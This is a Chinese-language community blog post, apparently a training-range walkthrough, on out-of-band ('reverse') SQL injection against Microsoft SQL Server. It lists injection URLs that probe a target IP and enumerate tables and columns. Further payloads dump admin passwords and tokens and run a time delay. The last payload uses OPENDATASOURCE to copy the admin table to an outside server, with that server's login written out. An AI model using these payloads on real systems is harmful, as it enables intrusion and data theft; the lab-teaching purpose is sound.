5-4 MSSQL注入 — 反弹注入

举报
Gere 发表于 2022/12/31 08:20:34 2022/12/31
【摘要】 一、MSSQL反弹注入使用场景明明是SQL的注射点却无法进行注射注射工具猜解的速度异常缓慢,错误提示信息关闭,无法返回注射结果等,这些都是在注射攻击中常常遇到的问题。为了解决以上这些疑难杂症,比较好的解决方法就是使用反弹注射技术,而反弹注射技术则需要依靠 opendatasource函数支持二、快速搭建一个MSSQL环境(骚姿势)香港云http://www.webweb.com/免费在线数据...


一、MSSQL反弹注入使用场景

明明是SQL的注射点却无法进行注射注射工具猜解的速度异常缓慢,
错误提示信息关闭,无法返回注射结果等,这些都是在注射攻击中常常遇到的问题。为了解决以上这些疑难杂症,比较好的解决方法就是使用反弹注射技术,而反弹注射技术则需要依靠 opendatasource函数支持

二、快速搭建一个MSSQL环境(骚姿势)

香港云http://www.webweb.com/

免费在线数据库https://my.gearhost.com/CloudSite

数据库操作http://mssqlus.webweb.com/

三、MSSQL反弹注入语句解析

insert into

插入语句

opendatasource(\'sqloledb\',\'server=SQL5009.webweb.com,1433;uid=DB_14A5E44_zkaq_admin;pwd=zkaqzkaq;database=DB_14A5E44_zkaq\').DB_14A5E44_zkaq.dbo.temp

服务器.库.表 opendatasource(\'sqloledb\',\'\').库.dbo.表

select*from admin --+

admin里的所有数据

四、MSSQL反弹注入靶场分析

1尝试

http://59.63.200.79:8015/?id=1 and 1=1

image-20201021212521446

从报错可以看出需要闭合单引号,后面注释

2.判断注入点

http://59.63.200.79:8015/?id=1\' and 1=1--+ 页面正常

http://59.63.200.79:8015/?id=1\' and 1=2--+ 页面异常

说明存在注入点

3.判断字段数

http://59.63.200.79:8015/?id=1\' order by 3--+页面正常

http://59.63.200.79:8015/?id=1\' order by 4--+页面异常

说明有3个字段

4.看回显点

http://59.63.200.79:8015/?id=1\' union all select 4,\'a\',\'b\'--+

猜输出点要使用NULL去填充

注释只有 --+ (不要想着#)

image-20201021213015337

可以查看回显点

5.查询表

查看用户创建的表

select*from sysobjects where xtype=\'U\';

image-20201021213835957

http://59.63.200.79:8015/?id=1\' union all select id, name ,null from sysobjects where xtype=\'U\'--+

image-20201021214821520

6.查询admin的字段

查看abc表的字段

select*from syscolumns where id=885578193;

image-20201021214632983

http://59.63.200.79:8015/?id=1\' union all select null,name,null from syscolumns where id=1977058079 --+

image-20201021215215611

7.查询admin的数据

http://59.63.200.79:8015/?id=1\' union all select id,passwd,token from admin --+

image-20201021215257170

8.其他反弹注入

http://59.63.200.79:8015/?id=1\';select*from syscolumns where id=1waitfor delay \'0:0:5\'--+

http://59.63.200.79:8015/?id=1\';insert into opendatasource(\'sqloledb\',\'server=den1.mssql7.gear.host,1433;uid=xcsxchen;pwd=Bu18PX8IY5-?;database=xcsxchen\').xcsxchen.dbo.temp select * from admin --+

image-20201021231102131

【版权声明】本文为华为云社区用户原创内容,转载时必须标注文章的来源(华为云社区)、文章链接、文章作者等基本信息, 否则作者和本社区有权追究责任。如果您发现本社区中有涉嫌抄袭的内容,欢迎发送邮件进行举报,并提供相关证据,一经查实,本社区将立刻删除涉嫌侵权内容,举报邮箱: cloudbbs@huaweicloud.com
数据库
  • 点赞
  • 收藏
  • 关注作者

评论(0

0/1000
抱歉,系统识别当前为高风险访问,暂不支持该操作

全部回复

上滑加载中

设置昵称

在此一键设置昵称,即可参与社区互动!

*长度不超过10个汉字或20个英文字符,设置后3个月内不可修改。

*长度不超过10个汉字或20个英文字符,设置后3个月内不可修改。

确认 取消

加入云驻计划,成为创作者

  • 华为云周边好礼
  • 免费体验产品
  • 特殊身份标识
  • 线下官方门票
  • 内部专家零距离
  • 与10000+优质创作者共同成长
立即加入